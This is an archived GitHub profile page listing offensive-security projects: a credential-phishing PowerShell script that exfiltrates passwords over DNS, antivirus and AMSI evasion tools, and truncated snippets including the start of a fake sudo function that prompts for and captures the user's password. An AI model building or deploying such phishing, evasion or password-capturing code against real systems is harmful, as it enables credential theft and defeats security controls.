The Wayback Machine - https://web.archive.org/web/20220620184207/https://github.com/tokyoneon
Skip to content
Avatar
💻
tokyoneon@kali ~#
💻
tokyoneon@kali ~#
Block or Report

Block or report tokyoneon

Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. CredPhish Public

    CredPhish is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.

    PowerShell 202 37

  2. 1
    # write-up: https://www.varonis.com/blog/author/tokyoneon/
    2
    
                  
    3
    # an if statement to prevent the attack from executing without administrator privileges
    4
    if (whoami /groups | findstr /i "S-1-16-12288")
    5
    {
  3. Chimera Public

    Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

    PowerShell 912 194

  4. Armor Public

    Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.

    Shell 255 53

  5. 1
    #!/bin/bash
    2
    
                  
    3
    # https://null-byte.com/turn-forums-into-c-c-servers-0196708/
    4
    
                  
    5
    while true; do
  6. 1
    function sudo () 
    2
    { 
    3
        # https://null-byte.com/privesc-0194190/
    4
        realsudo="$(which sudo)";
    5
        read -s -p "[sudo] password for $USER: " inputPasswd;

864 contributions in the last year

Jun Jul Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun Mon Wed Fri

Contribution activity

June 2022

153 contributions in private repositories Jun 1 – Jun 20